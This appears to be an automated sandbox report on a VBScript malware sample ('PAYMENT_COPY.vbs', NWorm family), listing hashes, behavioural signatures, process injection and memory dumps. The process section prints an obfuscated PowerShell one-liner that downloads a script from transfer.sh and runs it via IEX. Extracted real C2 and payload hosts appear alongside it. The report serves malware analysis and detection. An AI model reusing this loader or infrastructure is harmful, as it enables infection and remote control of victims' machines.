Analysis
- max time kernel: 147s
- max time network: 156s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220113
- submitted: 09-03-2022 14:58
Static task: static1
Behavioral task: behavioral1
  Sample: KVDKGYBAXAKQX_PAYMENT_COPY.vbs
  Resource: win7-20220223-en
Behavioral task: behavioral2
  Sample: KVDKGYBAXAKQX_PAYMENT_COPY.vbs
  Resource: win10v2004-en-20220113
General
- Target: KVDKGYBAXAKQX_PAYMENT_COPY.vbs
- Size: 9KB
- MD5: 8ade0a04317db340d7dcdc9a4b32c795
- SHA1: 30350a6e2339507039e86a68a99958b1d9dea157
- SHA256: 1aa032a3d316f19de0c0946185eb7331aa1270d52882550c867eae1ce540ade1
- SHA512: 7572ebc9ae53a8639285b849fa972d4f40eaf3a923e43430f85337a73810bdeb487d0231ffdb4f0391442c2acdb244ab03063ed0ddc78cd12248431476c2cdaf
Malware Config
- Extracted: https://transfer.sh/get/gnXbHK/ServerSHJWIJW8292.txt
- Extracted:
  Family: nworm
  Version: v0.3.8
  C2: nyanwmoney.duckdns.org:8891
  594274bc
Signatures

- NWorm
  A TrickBot module used to propagate to vulnerable domain controllers.

- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: POWERSHELL.exe
    description | pid | pid_target | process | target process
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4180 | 3488 | POWERSHELL.exe |

- Blocklisted process makes network request (1 IoC)
  Processes: POWERSHELL.exe
    flow | pid | process
    5 | 4180 | POWERSHELL.exe

- Suspicious use of SetThreadContext (1 IoC)
  Processes: powershell.exe
    description | pid | process | target process
    PID 444 set thread context of 1300 | 444 | powershell.exe | aspnet_compiler.exe

- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes: POWERSHELL.exe, powershell.exe
    pid | process
    4180 | POWERSHELL.exe
    4180 | POWERSHELL.exe
    444 | powershell.exe
    444 | powershell.exe
    444 | powershell.exe
    444 | powershell.exe

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes: POWERSHELL.exe, powershell.exe
    description | pid | process
    Token: SeDebugPrivilege | 4180 | POWERSHELL.exe
    Token: SeDebugPrivilege | 444 | powershell.exe

- Suspicious use of WriteProcessMemory (13 IoCs)
  Processes: POWERSHELL.exe, powershell.exe
    description | pid | process | target process
    PID 4180 wrote to memory of 444 | 4180 | POWERSHELL.exe | powershell.exe
    PID 4180 wrote to memory of 444 | 4180 | POWERSHELL.exe | powershell.exe
    PID 444 wrote to memory of 4876 | 444 | powershell.exe | aspnet_compiler.exe
    PID 444 wrote to memory of 4876 | 444 | powershell.exe | aspnet_compiler.exe
    PID 444 wrote to memory of 4876 | 444 | powershell.exe | aspnet_compiler.exe
    PID 444 wrote to memory of 1300 | 444 | powershell.exe | aspnet_compiler.exe
    PID 444 wrote to memory of 1300 | 444 | powershell.exe | aspnet_compiler.exe
    PID 444 wrote to memory of 1300 | 444 | powershell.exe | aspnet_compiler.exe
    PID 444 wrote to memory of 1300 | 444 | powershell.exe | aspnet_compiler.exe
    PID 444 wrote to memory of 1300 | 444 | powershell.exe | aspnet_compiler.exe
    PID 444 wrote to memory of 1300 | 444 | powershell.exe | aspnet_compiler.exe
    PID 444 wrote to memory of 1300 | 444 | powershell.exe | aspnet_compiler.exe
    PID 444 wrote to memory of 1300 | 444 | powershell.exe | aspnet_compiler.exe
Processes

- C:\Windows\System32\WScript.exe (tree level 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KVDKGYBAXAKQX_PAYMENT_COPY.vbs"

-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $Hx = 'https://transfer.sh/get/gnXbHK/ServerSHJWIJW8292.txt';$HB=('{2}{0}{1}' -f'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{l\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{o\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{a\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{d\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''),'9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25s9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25t9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25r9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25i9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25n9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25g9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25'.Replace('9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25',''),'&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9D&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9o&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9w&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9n&1+$3/2&0^3_@#+][<!
__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9'.Replace('&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9',''));$HBB=('{2}{0}{1}' -f'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{e\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{b\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{C\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{l\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''),'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{i\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{e\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{n\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{t\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''),'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{Ne\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{t\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{.W\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''));$GSUAKNINNSESVPWHEQDXGURPSZLTOWJ
ENLREXSBRNWNLWJBZJXDWWSWOHCQSHEDVYNSJYNALEJCJUSOTCFSJPKQUOZHBDYGCLWY=('{2}{0}{1}' -f'{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9w-O{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9b{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9j{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9e{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9c{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9t ${=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9H{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9'.Replace('{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9',''),'{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9BB{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9).$H{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9B({=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9$H{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9x){=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9'.Replace('{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9',''),'{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9I{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9`E{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9
<70([}+548-&2&{!1&001_79}7<9`X({=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9Ne{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9'.Replace('{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9',''));$HBBBBB = ($GSUAKNINNSESVPWHEQDXGURPSZLTOWJENLREXSBRNWNLWJBZJXDWWSWOHCQSHEDVYNSJYNALEJCJUSOTCFSJPKQUOZHBDYGCLWY -Join '')|I`E`X1⤵
  Signatures:
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree level 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1
    Signatures:
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (tree level 3)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (tree level 3)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Downloads

- C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1
  MD5: 96cbd4ee164e4feb93152e2ef2d0e229
  SHA1: 2f5963d3042b87d5e3684a8c1de74e3543aad81e
  SHA256: 2926650956ac94279c598ba4b761eac9fa34e49e8fe19580adf8c62fd2fac15a
  SHA512: 48df582b45e09a85e94d60502a1d5f68412ea1325d81ceb2256c5a142d09f4db57e2e6f746a55458276aa8d3d9af59ce66219489d9aa9b73c5dac2c8a7d27b5b
Memory dumps (file, filesize):
- memory/444-139-0x00000238EE576000-0x00000238EE578000-memory.dmp, 8KB
- memory/444-135-0x00007FFF89F30000-0x00007FFF8A9F1000-memory.dmp, 10.8MB
- memory/444-137-0x00000238EE570000-0x00000238EE572000-memory.dmp, 8KB
- memory/444-136-0x00000238EE573000-0x00000238EE575000-memory.dmp, 8KB
- memory/444-140-0x00000238F09D0000-0x00000238F09EA000-memory.dmp, 104KB
- memory/1300-141-0x0000000000400000-0x000000000040A000-memory.dmp, 40KB
- memory/1300-142-0x00000000746F0000-0x0000000074EA0000-memory.dmp, 7.7MB
- memory/1300-143-0x0000000005990000-0x0000000005991000-memory.dmp, 4KB
- memory/4180-132-0x0000026C0C3A0000-0x0000026C0C3A2000-memory.dmp, 8KB
- memory/4180-133-0x0000026C0C3A3000-0x0000026C0C3A5000-memory.dmp, 8KB
- memory/4180-134-0x0000026C0C3A6000-0x0000026C0C3A8000-memory.dmp, 8KB
- memory/4180-131-0x00007FFF89F30000-0x00007FFF8A9F1000-memory.dmp, 10.8MB
- memory/4180-130-0x0000026C0C470000-0x0000026C0C492000-memory.dmp, 136KB